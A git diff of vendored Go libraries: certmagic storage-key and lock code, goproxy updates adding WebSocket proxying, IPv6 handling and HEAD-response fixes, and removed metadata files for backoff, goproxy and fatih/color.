" ", "_",
|
||||
"+", "_plus_",
|
||||
"*", "wildcard_",
|
||||
":", "-",
|
||||
"..", "", // prevent directory traversal (regex allows single dots)
|
||||
)
|
||||
str = repl.Replace(str)
|
||||
|
||||
// finally remove all non-word characters
|
||||
return safeKeyRE.ReplaceAllLiteralString(str, "")
|
||||
}
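For example, Safe("Example.com:443") lowercases the input and maps the colon to a hyphen, yielding "example.com-443"; a wildcard prefix such as "*.example.com" becomes "wildcard_.example.com".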
|
||||
|
||||
// CleanUpOwnLocks immediately cleans up all
|
||||
// current locks obtained by this process. Since
|
||||
// this does not cancel the operations that
|
||||
// the locks are synchronizing, this should be
|
||||
// called only immediately before process exit.
|
||||
// Errors are only reported if a logger is given.
|
||||
func CleanUpOwnLocks(ctx context.Context, logger *zap.Logger) {
|
||||
locksMu.Lock()
|
||||
defer locksMu.Unlock()
|
||||
for lockKey, storage := range locks {
|
||||
err := storage.Unlock(ctx, lockKey)
|
||||
if err == nil {
|
||||
delete(locks, lockKey)
|
||||
} else if logger != nil {
|
||||
logger.Error("unable to clean up lock in storage backend",
|
||||
zap.Any("storage", storage),
|
||||
zap.String("lock_key", lockKey),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func acquireLock(ctx context.Context, storage Storage, lockKey string) error {
|
||||
err := storage.Lock(ctx, lockKey)
|
||||
if err == nil {
|
||||
locksMu.Lock()
|
||||
locks[lockKey] = storage
|
||||
locksMu.Unlock()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
func releaseLock(ctx context.Context, storage Storage, lockKey string) error {
|
||||
err := storage.Unlock(ctx, lockKey)
|
||||
if err == nil {
|
||||
locksMu.Lock()
|
||||
delete(locks, lockKey)
|
||||
locksMu.Unlock()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// locks stores a reference to all the current
|
||||
// locks obtained by this process.
|
||||
var locks = make(map[string]Storage)
|
||||
var locksMu sync.Mutex
|
||||
|
||||
// StorageKeys provides methods for accessing
|
||||
// keys and key prefixes for items in a Storage.
|
||||
// Typically, you will not need to use this
|
||||
// because accessing storage is abstracted away
|
||||
// for most cases. Only use this if you need to
|
||||
// directly access TLS assets in your application.
|
||||
var StorageKeys KeyBuilder
|
||||
|
||||
const (
|
||||
prefixCerts = "certificates"
|
||||
prefixOCSP = "ocsp"
|
||||
)
|
||||
|
||||
// safeKeyRE matches any undesirable characters in storage keys.
|
||||
// Note that this allows dots, so you'll have to strip ".." manually.
|
||||
var safeKeyRE = regexp.MustCompile(`[^\w@.-]`)
|
||||
|
||||
// defaultFileStorage is a convenient, default storage
|
||||
// implementation using the local file system.
|
||||
var defaultFileStorage = &FileStorage{Path: dataDir()}
|
3
vendor/github.com/cenkalti/backoff/v3/go.mod
generated
vendored
@ -1,3 +0,0 @@
|
||||
module github.com/cenkalti/backoff/v3
|
||||
|
||||
go 1.12
|
7
vendor/github.com/elazarl/goproxy/README.md
generated
vendored
@ -2,6 +2,7 @@
|
||||
|
||||
[](https://godoc.org/github.com/elazarl/goproxy)
|
||||
[](https://gitter.im/elazarl/goproxy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
|
||||

|
||||
|
||||
Package goproxy provides a customizable HTTP proxy library for Go (golang),
|
||||
|
||||
@ -96,7 +97,7 @@ a `ReqCondition` accepting only requests directed to "www.reddit.com".
|
||||
|
||||
`DoFunc` will receive a function that will preprocess the request. We can change the request, or
|
||||
return a response. If the time is between 8:00am and 17:00pm, we will reject the request, and
|
||||
return a precanned text response saying "do not waste your time".
|
||||
return a pre-canned text response saying "do not waste your time".
|
||||
|
||||
See additional examples in the examples directory.
|
||||
|
||||
@ -135,12 +136,12 @@ For example:
|
||||
|
||||
```go
|
||||
// This rejects the HTTPS request to *.reddit.com during HTTP CONNECT phase
|
||||
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile("reddit.*:443$"))).HandleConnect(goproxy.RejectConnect)
|
||||
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile("reddit.*:443$"))).HandleConnect(goproxy.AlwaysReject)
|
||||
|
||||
// This will NOT reject the HTTPS request with URL ending with gif, due to the fact that proxy
|
||||
// only got the URL.Hostname and URL.Port during the HTTP CONNECT phase if the scheme is HTTPS, which is
|
||||
// quite common these days.
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).HandleConnect(goproxy.RejectConnect)
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).HandleConnect(goproxy.AlwaysReject)
|
||||
|
||||
// The correct way to manipulate the HTTP request using URL.Path as condition is:
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).Do(YourReqHandlerFunc())
|
||||
|
8
vendor/github.com/elazarl/goproxy/ctx.go
generated
vendored
@ -22,7 +22,7 @@ type ProxyCtx struct {
|
||||
// Will connect a request to a response
|
||||
Session int64
|
||||
certStore CertStorage
|
||||
proxy *ProxyHttpServer
|
||||
Proxy *ProxyHttpServer
|
||||
}
|
||||
|
||||
type RoundTripper interface {
|
||||
@ -43,11 +43,11 @@ func (ctx *ProxyCtx) RoundTrip(req *http.Request) (*http.Response, error) {
|
||||
if ctx.RoundTripper != nil {
|
||||
return ctx.RoundTripper.RoundTrip(req, ctx)
|
||||
}
|
||||
return ctx.proxy.Tr.RoundTrip(req)
|
||||
return ctx.Proxy.Tr.RoundTrip(req)
|
||||
}
|
||||
|
||||
func (ctx *ProxyCtx) printf(msg string, argv ...interface{}) {
|
||||
ctx.proxy.Logger.Printf("[%03d] "+msg+"\n", append([]interface{}{ctx.Session & 0xFF}, argv...)...)
|
||||
ctx.Proxy.Logger.Printf("[%03d] "+msg+"\n", append([]interface{}{ctx.Session & 0xFF}, argv...)...)
|
||||
}
|
||||
|
||||
// Logf prints a message to the proxy's log. Should be used in a ProxyHttpServer's filter
|
||||
@ -59,7 +59,7 @@ func (ctx *ProxyCtx) printf(msg string, argv ...interface{}) {
|
||||
// return r, nil
|
||||
// })
|
||||
func (ctx *ProxyCtx) Logf(msg string, argv ...interface{}) {
|
||||
if ctx.proxy.Verbose {
|
||||
if ctx.Proxy.Verbose {
|
||||
ctx.printf("INFO: "+msg, argv...)
|
||||
}
|
||||
}
|
||||
|
16
vendor/github.com/elazarl/goproxy/dispatcher.go
generated
vendored
@ -161,6 +161,22 @@ func ContentTypeIs(typ string, types ...string) RespCondition {
|
||||
})
|
||||
}
|
||||
|
||||
// StatusCodeIs returns a RespCondition, testing whether or not the HTTP status
|
||||
// code is one of the given ints
|
||||
func StatusCodeIs(codes ...int) RespCondition {
|
||||
codeSet := make(map[int]bool)
|
||||
for _, c := range codes {
|
||||
codeSet[c] = true
|
||||
}
|
||||
return RespConditionFunc(func(resp *http.Response, ctx *ProxyCtx) bool {
|
||||
if resp == nil {
|
||||
return false
|
||||
}
|
||||
_, codeMatch := codeSet[resp.StatusCode]
|
||||
return codeMatch
|
||||
})
|
||||
}
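For context, a response condition like the one added above is typically registered like this (editor's sketch; the ports, status codes, and handler body are illustrative):

```go
// Editor's illustration: using the new StatusCodeIs condition to log 5xx
// responses passing through the proxy.
package main

import (
	"net/http"

	"github.com/elazarl/goproxy"
)

func main() {
	proxy := goproxy.NewProxyHttpServer()
	proxy.OnResponse(goproxy.StatusCodeIs(500, 502, 503)).DoFunc(
		func(resp *http.Response, ctx *goproxy.ProxyCtx) *http.Response {
			ctx.Logf("upstream returned %d for %s", resp.StatusCode, ctx.Req.URL)
			return resp
		})
	http.ListenAndServe(":8080", proxy)
}
```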
|
||||
|
||||
// ProxyHttpServer.OnRequest will return a temporary ReqProxyConds struct, aggregating the given conditions.
|
||||
// You will use the ReqProxyConds struct to register a ReqHandler, that would filter
|
||||
// the request, only if all the given ReqCondition matched.
|
||||
|
4
vendor/github.com/elazarl/goproxy/doc.go
generated
vendored
@ -3,7 +3,7 @@ Package goproxy provides a customizable HTTP proxy,
|
||||
supporting hijacking HTTPS connection.
|
||||
|
||||
The intent of the proxy, is to be usable with reasonable amount of traffic
|
||||
yet, customizable and programable.
|
||||
yet, customizable and programmable.
|
||||
|
||||
The proxy itself is simply an `net/http` handler.
|
||||
|
||||
@ -63,7 +63,7 @@ Finally, we have convenience function to throw a quick response
|
||||
return goproxy.NewResponse(ctx.Req, goproxy.ContentTypeText, http.StatusForbidden, "Can't see response with X-GoProxy header!")
|
||||
})
|
||||
|
||||
we close the body of the original repsonse, and return a new 403 response with a short message.
|
||||
we close the body of the original response, and return a new 403 response with a short message.
|
||||
|
||||
Example use cases:
|
||||
|
||||
|
3
vendor/github.com/elazarl/goproxy/go.mod
generated
vendored
@ -1,3 +0,0 @@
|
||||
module github.com/elazarl/goproxy
|
||||
|
||||
require github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2
|
3
vendor/github.com/elazarl/goproxy/go.sum
generated
vendored
@ -1,3 +0,0 @@
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2 h1:dWB6v3RcOy03t/bUadywsbyrQwCqZeNIEX6M1OtSZOM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2/go.mod h1:gNh8nYJoAm43RfaxurUnxr+N1PwuFV3ZMl/efxlIlY8=
|
||||
github.com/rogpeppe/go-charset v0.0.0-20180617210344-2471d30d28b4/go.mod h1:qgYeAmZ5ZIpBWTGllZSQnw97Dj+woV0toclVaRGI8pc=
|
101
vendor/github.com/elazarl/goproxy/https.go
generated
vendored
@ -36,6 +36,10 @@ var (
|
||||
httpsRegexp = regexp.MustCompile(`^https:\/\/`)
|
||||
)
|
||||
|
||||
// ConnectAction enables the caller to override the standard connect flow.
|
||||
// When Action is ConnectHijack, it is up to the implementer to send the
|
||||
// HTTP 200, or any other valid http response back to the client from within the
|
||||
// Hijack func
|
||||
type ConnectAction struct {
|
||||
Action ConnectActionLiteral
|
||||
Hijack func(req *http.Request, client net.Conn, ctx *ProxyCtx)
|
||||
@ -43,9 +47,25 @@ type ConnectAction struct {
|
||||
}
|
||||
|
||||
func stripPort(s string) string {
|
||||
ix := strings.IndexRune(s, ':')
|
||||
if ix == -1 {
|
||||
return s
|
||||
var ix int
|
||||
if strings.Contains(s, "[") && strings.Contains(s, "]") {
|
||||
//ipv6 : for example : [2606:4700:4700::1111]:443
|
||||
|
||||
//strip '[' and ']'
|
||||
s = strings.ReplaceAll(s, "[", "")
|
||||
s = strings.ReplaceAll(s, "]", "")
|
||||
|
||||
ix = strings.LastIndexAny(s, ":")
|
||||
if ix == -1 {
|
||||
return s
|
||||
}
|
||||
} else {
|
||||
//ipv4
|
||||
ix = strings.IndexRune(s, ':')
|
||||
if ix == -1 {
|
||||
return s
|
||||
}
|
||||
|
||||
}
|
||||
return s[:ix]
|
||||
}
|
||||
@ -64,8 +84,16 @@ func (proxy *ProxyHttpServer) connectDial(network, addr string) (c net.Conn, err
|
||||
return proxy.ConnectDial(network, addr)
|
||||
}
|
||||
|
||||
type halfClosable interface {
|
||||
net.Conn
|
||||
CloseWrite() error
|
||||
CloseRead() error
|
||||
}
|
||||
|
||||
var _ halfClosable = (*net.TCPConn)(nil)
|
||||
|
||||
func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request) {
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, certStore: proxy.CertStore}
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy, certStore: proxy.CertStore}
|
||||
|
||||
hij, ok := w.(http.Hijacker)
|
||||
if !ok {
|
||||
@ -100,10 +128,10 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
return
|
||||
}
|
||||
ctx.Logf("Accepting CONNECT to %s", host)
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 Connection established\r\n\r\n"))
|
||||
|
||||
targetTCP, targetOK := targetSiteCon.(*net.TCPConn)
|
||||
proxyClientTCP, clientOK := proxyClient.(*net.TCPConn)
|
||||
targetTCP, targetOK := targetSiteCon.(halfClosable)
|
||||
proxyClientTCP, clientOK := proxyClient.(halfClosable)
|
||||
if targetOK && clientOK {
|
||||
go copyAndClose(ctx, targetTCP, proxyClientTCP)
|
||||
go copyAndClose(ctx, proxyClientTCP, targetTCP)
|
||||
@ -121,8 +149,6 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
}
|
||||
|
||||
case ConnectHijack:
|
||||
ctx.Logf("Hijacking CONNECT to %s", host)
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
todo.Hijack(r, proxyClient, ctx)
|
||||
case ConnectHTTPMitm:
|
||||
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
|
||||
@ -188,7 +214,7 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
clientTlsReader := bufio.NewReader(rawClientTls)
|
||||
for !isEof(clientTlsReader) {
|
||||
req, err := http.ReadRequest(clientTlsReader)
|
||||
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, UserData: ctx.UserData}
|
||||
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy, UserData: ctx.UserData}
|
||||
if err != nil && err != io.EOF {
|
||||
return
|
||||
}
|
||||
@ -209,6 +235,11 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
|
||||
req, resp := proxy.filterRequest(req, ctx)
|
||||
if resp == nil {
|
||||
if isWebSocketRequest(req) {
|
||||
ctx.Logf("Request looks like websocket upgrade.")
|
||||
proxy.serveWebsocketTLS(ctx, w, req, tlsConfig, rawClientTls)
|
||||
return
|
||||
}
|
||||
if err != nil {
|
||||
ctx.Warnf("Illegal URL %s", "https://"+r.Host+req.URL.Path)
|
||||
return
|
||||
@ -234,10 +265,15 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
ctx.Warnf("Cannot write TLS response HTTP status from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
// Since we don't know the length of resp, return chunked encoded response
|
||||
// TODO: use a more reasonable scheme
|
||||
resp.Header.Del("Content-Length")
|
||||
resp.Header.Set("Transfer-Encoding", "chunked")
|
||||
|
||||
if resp.Request.Method == "HEAD" {
|
||||
// don't change Content-Length for HEAD request
|
||||
} else {
|
||||
// Since we don't know the length of resp, return chunked encoded response
|
||||
// TODO: use a more reasonable scheme
|
||||
resp.Header.Del("Content-Length")
|
||||
resp.Header.Set("Transfer-Encoding", "chunked")
|
||||
}
|
||||
// Force connection close otherwise chrome will keep CONNECT tunnel open forever
|
||||
resp.Header.Set("Connection", "close")
|
||||
if err := resp.Header.Write(rawClientTls); err != nil {
|
||||
@ -248,18 +284,23 @@ func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request
|
||||
ctx.Warnf("Cannot write TLS response header end from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
chunked := newChunkedWriter(rawClientTls)
|
||||
if _, err := io.Copy(chunked, resp.Body); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response body from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if err := chunked.Close(); err != nil {
|
||||
ctx.Warnf("Cannot write TLS chunked EOF from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if _, err = io.WriteString(rawClientTls, "\r\n"); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response chunked trailer from mitm'd client: %v", err)
|
||||
return
|
||||
|
||||
if resp.Request.Method == "HEAD" {
|
||||
// Don't write out a response body for HEAD request
|
||||
} else {
|
||||
chunked := newChunkedWriter(rawClientTls)
|
||||
if _, err := io.Copy(chunked, resp.Body); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response body from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if err := chunked.Close(); err != nil {
|
||||
ctx.Warnf("Cannot write TLS chunked EOF from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
if _, err = io.WriteString(rawClientTls, "\r\n"); err != nil {
|
||||
ctx.Warnf("Cannot write TLS response chunked trailer from mitm'd client: %v", err)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
ctx.Logf("Exiting on EOF")
|
||||
@ -293,7 +334,7 @@ func copyOrWarn(ctx *ProxyCtx, dst io.Writer, src io.Reader, wg *sync.WaitGroup)
|
||||
wg.Done()
|
||||
}
|
||||
|
||||
func copyAndClose(ctx *ProxyCtx, dst, src *net.TCPConn) {
|
||||
func copyAndClose(ctx *ProxyCtx, dst, src halfClosable) {
|
||||
if _, err := io.Copy(dst, src); err != nil {
|
||||
ctx.Warnf("Error copying to client: %s", err)
|
||||
}
|
||||
@ -362,7 +403,7 @@ func (proxy *ProxyHttpServer) NewConnectDialToProxyWithHandler(https_proxy strin
|
||||
return c, nil
|
||||
}
|
||||
}
|
||||
if u.Scheme == "https" {
|
||||
if u.Scheme == "https" || u.Scheme == "wss" {
|
||||
if strings.IndexRune(u.Host, ':') == -1 {
|
||||
u.Host += ":443"
|
||||
}
|
||||
@ -412,7 +453,7 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls
|
||||
var cert *tls.Certificate
|
||||
|
||||
hostname := stripPort(host)
|
||||
config := *defaultTLSConfig
|
||||
config := defaultTLSConfig.Clone()
|
||||
ctx.Logf("signing for %s", stripPort(host))
|
||||
|
||||
genCert := func() (*tls.Certificate, error) {
|
||||
@ -430,6 +471,6 @@ func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls
|
||||
}
|
||||
|
||||
config.Certificates = append(config.Certificates, *cert)
|
||||
return &config, nil
|
||||
return config, nil
|
||||
}
|
||||
}
|
||||
|
55
vendor/github.com/elazarl/goproxy/proxy.go
generated
vendored
@ -30,6 +30,7 @@ type ProxyHttpServer struct {
|
||||
// if nil Tr.Dial will be used
|
||||
ConnectDial func(network string, addr string) (net.Conn, error)
|
||||
CertStore CertStorage
|
||||
KeepHeader bool
|
||||
}
|
||||
|
||||
var hasPort = regexp.MustCompile(`:\d+$`)
|
||||
@ -93,16 +94,40 @@ func removeProxyHeaders(ctx *ProxyCtx, r *http.Request) {
|
||||
// The Connection general-header field allows the sender to specify
|
||||
// options that are desired for that particular connection and MUST NOT
|
||||
// be communicated by proxies over further connections.
|
||||
|
||||
// When server reads http request it sets req.Close to true if
|
||||
// "Connection" header contains "close".
|
||||
// https://github.com/golang/go/blob/master/src/net/http/request.go#L1080
|
||||
// Later, transfer.go adds "Connection: close" back when req.Close is true
|
||||
// https://github.com/golang/go/blob/master/src/net/http/transfer.go#L275
|
||||
// That's why tests that checks "Connection: close" removal fail
|
||||
if r.Header.Get("Connection") == "close" {
|
||||
r.Close = false
|
||||
}
|
||||
r.Header.Del("Connection")
|
||||
}
|
||||
|
||||
type flushWriter struct {
|
||||
w io.Writer
|
||||
}
|
||||
|
||||
func (fw flushWriter) Write(p []byte) (int, error) {
|
||||
n, err := fw.w.Write(p)
|
||||
if f, ok := fw.w.(http.Flusher); ok {
|
||||
// only flush if the Writer implements the Flusher interface.
|
||||
f.Flush()
|
||||
}
|
||||
|
||||
return n, err
|
||||
}
|
||||
|
||||
// Standard net/http function. Shouldn't be used directly, http.Serve will use it.
|
||||
func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
|
||||
//r.Header["X-Forwarded-For"] = w.RemoteAddr()
|
||||
if r.Method == "CONNECT" {
|
||||
proxy.handleHttps(w, r)
|
||||
} else {
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy}
|
||||
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), Proxy: proxy}
|
||||
|
||||
var err error
|
||||
ctx.Logf("Got request %v %v %v %v", r.URL.Path, r.Host, r.Method, r.URL.String())
|
||||
@ -113,7 +138,14 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
r, resp := proxy.filterRequest(r, ctx)
|
||||
|
||||
if resp == nil {
|
||||
removeProxyHeaders(ctx, r)
|
||||
if isWebSocketRequest(r) {
|
||||
ctx.Logf("Request looks like websocket upgrade.")
|
||||
proxy.serveWebsocket(ctx, w, r)
|
||||
}
|
||||
|
||||
if !proxy.KeepHeader {
|
||||
removeProxyHeaders(ctx, r)
|
||||
}
|
||||
resp, err = ctx.RoundTrip(r)
|
||||
if err != nil {
|
||||
ctx.Error = err
|
||||
@ -124,6 +156,14 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
ctx.Logf("Received response %v", resp.Status)
|
||||
}
|
||||
}
|
||||
|
||||
var origBody io.ReadCloser
|
||||
|
||||
if resp != nil {
|
||||
origBody = resp.Body
|
||||
defer origBody.Close()
|
||||
}
|
||||
|
||||
resp = proxy.filterResponse(resp, ctx)
|
||||
|
||||
if resp == nil {
|
||||
@ -139,8 +179,6 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
}
|
||||
return
|
||||
}
|
||||
origBody := resp.Body
|
||||
defer origBody.Close()
|
||||
ctx.Logf("Copying response to client %v [%d]", resp.Status, resp.StatusCode)
|
||||
// http.ResponseWriter will take care of filling the correct response length
|
||||
// Setting it now, might impose wrong value, contradicting the actual new
|
||||
@ -153,7 +191,13 @@ func (proxy *ProxyHttpServer) ServeHTTP(w http.ResponseWriter, r *http.Request)
|
||||
}
|
||||
copyHeaders(w.Header(), resp.Header, proxy.KeepDestinationHeaders)
|
||||
w.WriteHeader(resp.StatusCode)
|
||||
nr, err := io.Copy(w, resp.Body)
|
||||
var copyWriter io.Writer = w
|
||||
if w.Header().Get("content-type") == "text/event-stream" {
|
||||
// server-side events, flush the buffered data to the client.
|
||||
copyWriter = &flushWriter{w: w}
|
||||
}
|
||||
|
||||
nr, err := io.Copy(copyWriter, resp.Body)
|
||||
if err := resp.Body.Close(); err != nil {
|
||||
ctx.Warnf("Can't close response body %v", err)
|
||||
}
|
||||
@ -173,6 +217,7 @@ func NewProxyHttpServer() *ProxyHttpServer {
|
||||
}),
|
||||
Tr: &http.Transport{TLSClientConfig: tlsClientSkipVerify, Proxy: http.ProxyFromEnvironment},
|
||||
}
|
||||
|
||||
proxy.ConnectDial = dialerFromEnv(&proxy)
|
||||
|
||||
return &proxy
|
||||
|
130
vendor/github.com/elazarl/goproxy/websocket.go
generated
vendored
Normal file
@ -0,0 +1,130 @@
|
||||
package goproxy
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"crypto/tls"
|
||||
"io"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func headerContains(header http.Header, name string, value string) bool {
|
||||
for _, v := range header[name] {
|
||||
for _, s := range strings.Split(v, ",") {
|
||||
if strings.EqualFold(value, strings.TrimSpace(s)) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func isWebSocketRequest(r *http.Request) bool {
|
||||
return headerContains(r.Header, "Connection", "upgrade") &&
|
||||
headerContains(r.Header, "Upgrade", "websocket")
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) serveWebsocketTLS(ctx *ProxyCtx, w http.ResponseWriter, req *http.Request, tlsConfig *tls.Config, clientConn *tls.Conn) {
|
||||
host, port, _ := net.SplitHostPort(req.URL.Host)
|
||||
if port == "" {
|
||||
host += ":443"
|
||||
}
|
||||
targetURL := url.URL{Scheme: "wss", Host: host, Path: req.URL.Path}
|
||||
|
||||
// Connect to upstream
|
||||
targetConn, err := tls.Dial("tcp", targetURL.Host, tlsConfig)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error dialing target site: %v", err)
|
||||
return
|
||||
}
|
||||
defer targetConn.Close()
|
||||
|
||||
// Perform handshake
|
||||
if err := proxy.websocketHandshake(ctx, req, targetConn, clientConn); err != nil {
|
||||
ctx.Warnf("Websocket handshake error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Proxy wss connection
|
||||
proxy.proxyWebsocket(ctx, targetConn, clientConn)
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) serveWebsocket(ctx *ProxyCtx, w http.ResponseWriter, req *http.Request) {
|
||||
host, port, _ := net.SplitHostPort(req.URL.Host)
|
||||
if port == "" {
|
||||
host += ":80"
|
||||
}
|
||||
targetURL := url.URL{Scheme: "ws", Host: host, Path: req.URL.Path}
|
||||
|
||||
targetConn, err := proxy.connectDial("tcp", targetURL.Host)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error dialing target site: %v", err)
|
||||
return
|
||||
}
|
||||
defer targetConn.Close()
|
||||
|
||||
// Connect to Client
|
||||
hj, ok := w.(http.Hijacker)
|
||||
if !ok {
|
||||
panic("httpserver does not support hijacking")
|
||||
}
|
||||
clientConn, _, err := hj.Hijack()
|
||||
if err != nil {
|
||||
ctx.Warnf("Hijack error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Perform handshake
|
||||
if err := proxy.websocketHandshake(ctx, req, targetConn, clientConn); err != nil {
|
||||
ctx.Warnf("Websocket handshake error: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
// Proxy ws connection
|
||||
proxy.proxyWebsocket(ctx, targetConn, clientConn)
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) websocketHandshake(ctx *ProxyCtx, req *http.Request, targetSiteConn io.ReadWriter, clientConn io.ReadWriter) error {
|
||||
// write handshake request to target
|
||||
err := req.Write(targetSiteConn)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error writing upgrade request: %v", err)
|
||||
return err
|
||||
}
|
||||
|
||||
targetTLSReader := bufio.NewReader(targetSiteConn)
|
||||
|
||||
// Read handshake response from target
|
||||
resp, err := http.ReadResponse(targetTLSReader, req)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error reading handhsake response %v", err)
|
||||
return err
|
||||
}
|
||||
|
||||
// Run response through handlers
|
||||
resp = proxy.filterResponse(resp, ctx)
|
||||
|
||||
// Proxy handshake back to client
|
||||
err = resp.Write(clientConn)
|
||||
if err != nil {
|
||||
ctx.Warnf("Error writing handshake response: %v", err)
|
||||
return err
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (proxy *ProxyHttpServer) proxyWebsocket(ctx *ProxyCtx, dest io.ReadWriter, source io.ReadWriter) {
|
||||
errChan := make(chan error, 2)
|
||||
cp := func(dst io.Writer, src io.Reader) {
|
||||
_, err := io.Copy(dst, src)
|
||||
ctx.Warnf("Websocket error: %v", err)
|
||||
errChan <- err
|
||||
}
|
||||
|
||||
// Start proxying websocket data
|
||||
go cp(dest, source)
|
||||
go cp(source, dest)
|
||||
<-errChan
|
||||
}
|
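The changelog entry "WebSocket connections are now properly proxied" rests on these vendored helpers. As a rough, self-contained sketch (not part of this commit) of how the upgrade detection above is typically used to branch a handler between plain HTTP and WebSocket traffic:

```go
package main

import (
    "log"
    "net/http"
    "strings"
)

// upgradeRequested mirrors the isWebSocketRequest/headerContains logic from
// the vendored file above, using only the standard library.
func upgradeRequested(r *http.Request) bool {
    contains := func(name, value string) bool {
        for _, v := range r.Header[name] {
            for _, s := range strings.Split(v, ",") {
                if strings.EqualFold(value, strings.TrimSpace(s)) {
                    return true
                }
            }
        }
        return false
    }
    return contains("Connection", "upgrade") && contains("Upgrade", "websocket")
}

func main() {
    // A proxy built on goproxy would call serveWebsocket/serveWebsocketTLS
    // here instead of rejecting the upgrade.
    http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        if upgradeRequested(r) {
            http.Error(w, "websocket tunnelling would start here", http.StatusNotImplemented)
            return
        }
        w.Write([]byte("plain HTTP request\n"))
    })
    log.Fatal(http.ListenAndServe("127.0.0.1:8080", nil))
}
```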
5 vendor/github.com/fatih/color/.travis.yml generated vendored
@ -1,5 +0,0 @@
language: go
go:
  - 1.8.x
  - tip
27 vendor/github.com/fatih/color/Gopkg.lock generated vendored
@ -1,27 +0,0 @@
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.

[[projects]]
  name = "github.com/mattn/go-colorable"
  packages = ["."]
  revision = "167de6bfdfba052fa6b2d3664c8f5272e23c9072"
  version = "v0.0.9"

[[projects]]
  name = "github.com/mattn/go-isatty"
  packages = ["."]
  revision = "0360b2af4f38e8d38c7fce2a9f4e702702d73a39"
  version = "v0.0.3"

[[projects]]
  branch = "master"
  name = "golang.org/x/sys"
  packages = ["unix"]
  revision = "37707fdb30a5b38865cfb95e5aab41707daec7fd"

[solve-meta]
  analyzer-name = "dep"
  analyzer-version = 1
  inputs-digest = "e8a50671c3cb93ea935bf210b1cd20702876b9d9226129be581ef646d1565cdc"
  solver-name = "gps-cdcl"
  solver-version = 1
30 vendor/github.com/fatih/color/Gopkg.toml generated vendored
@ -1,30 +0,0 @@
# Gopkg.toml example
#
# Refer to https://github.com/golang/dep/blob/master/docs/Gopkg.toml.md
# for detailed Gopkg.toml documentation.
#
# required = ["github.com/user/thing/cmd/thing"]
# ignored = ["github.com/user/project/pkgX", "bitbucket.org/user/project/pkgA/pkgY"]
#
# [[constraint]]
#   name = "github.com/user/project"
#   version = "1.0.0"
#
# [[constraint]]
#   name = "github.com/user/project2"
#   branch = "dev"
